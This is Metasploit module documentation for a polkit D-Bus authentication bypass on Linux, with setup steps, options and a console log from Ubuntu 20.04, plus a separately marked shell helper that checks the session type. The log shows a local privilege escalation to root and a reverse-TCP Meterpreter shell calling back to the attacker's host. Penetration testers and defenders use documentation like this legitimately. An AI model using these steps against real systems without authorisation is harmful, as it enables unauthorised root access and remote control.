2021-06-25 18:00:08 -04:00
## Description
This module exploits an authentication bypass on Linux machines that make use of the polkit system service.
The vulnerability enables an unprivileged local user to get a root shell on the system.
This exploit needs to be run from an SSH or other non-graphical session. The `dbus-send` command used to trigger the exploit
launches an authentication agent. When run from a graphical session, the authentication agent pops up as a
dialog box and waits for user input. This dialog box causes the `dbus-send` command to time out waiting for user input and
prevents successful exploitation of polkit.
If `systemd` is installed on the system, the session service type can be checked by running `loginctl session-status`.
The following output (x11) indicates a graphical session is being run and the exploit will not work:
`Service: gdm-password; type x11; class user`
The following output (tty) indicates a non-graphical session is being used and the exploit is likely to be successful:
`Service: sshd; type tty; class user`
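An added example (not part of the module documentation or the Metasploit project): a small POSIX shell helper that parses the `Service:` line of `loginctl session-status` output and classifies the session as graphical or non-graphical, which is the pre-check described above. The two status blocks are constructed sample output; treating `wayland` and `mir` as graphical alongside `x11` is an assumption based on logind's session types, not something the page states.

```shell
#!/bin/sh
# Constructed sample output of `loginctl session-status` for an SSH session.
SSH_STATUS='5 - alice (1000)
           Since: Fri 2021-06-25 17:54:45 EDT; 1min ago
          Leader: 2187 (sshd)
             TTY: pts/0
         Service: sshd; type tty; class user
           State: active'

# Constructed sample output for a desktop (GDM) login session.
GDM_STATUS='2 - alice (1000)
           Since: Fri 2021-06-25 09:12:03 EDT; 8h ago
          Leader: 1402 (gdm-session-wor)
            Seat: seat0
         Service: gdm-password; type x11; class user
           State: active'

# session_type: read status text on stdin and print the "type" field from the
# "Service:" line (tty, x11, wayland, ...). Prints "unknown" if no such line.
session_type() {
    sed -n 's/.*Service: *[^;]*; *type *\([^;]*\);.*/\1/p' \
        | head -n 1 | tr -d ' ' | grep . || echo unknown
}

# classify_session: read status text on stdin and print "graphical",
# "non-graphical" or "unknown". Assumption: wayland and mir sessions also
# run an authentication agent that would pop up a dialog, like x11.
classify_session() {
    case "$(session_type)" in
        tty)              echo non-graphical ;;
        x11|wayland|mir)  echo graphical ;;
        *)                echo unknown ;;
    esac
}

# Stand-alone demo: on a live system replace the sample text with
#   loginctl session-status | classify_session
printf '%s\n' "$SSH_STATUS" | classify_session
printf '%s\n' "$GDM_STATUS" | classify_session
```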
## Vulnerable Application
This module has been tested successfully on:
* Ubuntu 20.04
### Installation And Setup
Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu.com/download/desktop
## Verification Steps
1. Start msfconsole.
2. Get a session.
3. Do: `use exploit/linux/local/polkit_dbus_auth_bypass`.
4. Set the `SESSION` to the session obtained in step 2.
5. Set the `LHOST`, `LPORT` and `PAYLOAD` options as appropriate.
6. Do: `run`.
7. It is possible for the exploit to fail. If this happens, increase the value of the `ITERATIONS` option so the exploit is attempted more times before failing, then run the exploit again.
8. Enjoy the shell.
## Options
**SESSION**
The session to run this module on.
**USERNAME**
The name of the user the exploit will add to the system.
**PASSWORD**
The password for the user to be created.
**WritableDir**
Directory to write the file to (`%TEMP%` by default).
## Scenarios
### Tested on Ubuntu 20.04
```
msf6 > use multi/handler
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use polkit_dbus
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/local/polkit_dbus_auth_bypass  2021-06-03       excellent  Yes    Polkit Authentication Bypass


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/polkit_dbus_auth_bypass
[*] Using exploit/linux/local/polkit_dbus_auth_bypass
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4443
lport => 4443
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
session => 1
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
[*] Started reverse TCP handler on 192.168.123.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user msf
[+] User msf created with UID 1019
[*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
[+] Obtained code execution as root!
[*] Writing '/tmp/vOWnn' (207 bytes) ...
[*] Sending stage (984904 bytes) to 192.168.123.146
[+] Deleted /tmp/vOWnn
[*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
[*] Attempting to remove the user added:
[+] Successfully removed msf
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer : 192.168.123.146
OS : Ubuntu 20.04 (Linux 5.8.0-55-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
```